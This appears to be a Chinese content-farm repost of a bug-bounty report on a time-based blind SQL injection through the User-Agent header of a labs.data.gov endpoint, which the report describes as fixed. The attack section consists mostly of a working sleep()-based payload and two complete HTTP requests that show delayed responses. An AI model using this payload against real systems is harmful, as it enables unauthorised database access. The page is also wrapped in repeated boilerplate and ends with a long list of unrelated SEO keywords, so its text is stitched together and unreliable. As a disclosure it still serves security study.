如何分析 HTTP头注入中的User-Agent注入
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,如何分析 HTTP头注入中的User-Agent注入,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。漏洞信息发现者:har
千家信息网最后更新 2025年12月02日如何分析 HTTP头注入中的User-Agent注入
漏洞信息 发现者:harisec
前言 Harisec在以下网站中发现一个SQL注入漏洞,注入的位置在User-Agent。
漏洞再现
Harisec使用了盲注的方式来确认该漏洞
漏洞影响
如何分析 HTTP头注入中的User-Agent注入,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
漏洞种类:SQL注入
危害等级:严重
漏洞状态:已修复
https://labs.data.gov/dashboard/datagov/csv_to_json
例如:将User-Agent的值设置为
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
将导致服务器在25秒后响应
这里,我们看一下具体的数据包内容
GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
服务器在25秒后响应,与User-Agent的值相同
将User-Agent的值改一下,改成9秒后响应
GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(3*3),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
该漏洞可以使攻击者注入恶意的SQL语句。
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注行业资讯频道,感谢您对的支持。
漏洞
内容
服务器
帮助
服务
分析
清楚
相同
位置
信息
前言
发现者
可以使
对此
恶意
攻击者
数据
文章
新手
方式
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
硚口软件开发中心
网络技术促销农特产品
如何卸载安全中心服务器
安徽程序软件开发收费报价表
北京服务器机房按需定制云服务器
选修课软件开发基础怎么样
sql数据库备份的命令
服务器连接上了但是不能上网
网络安全考研qq
计算机二级级网络技术
宁夏微信小程序服务器托管
损坏别人的服务器好不好
精雕CAD软件开发工程师
服务器账期
斑马网络技术天眼查
普通文件存入数据库中
如何实现数据库的共享
中国非遗数据库
服务器上内存做回写盘
软件开发阶段文件
网络安全健康文明手抄报
网络安全宣传周上虞
俄区艾尔登法环无法登陆服务器
农业银行软件开发工程师待遇
微信数据库用的是什么
中国林业数据库
福州优易通网络技术有限公司
服务器硬盘有必要分区吗
北京诚信网络技术服务哪家好
数据库不能查中文版
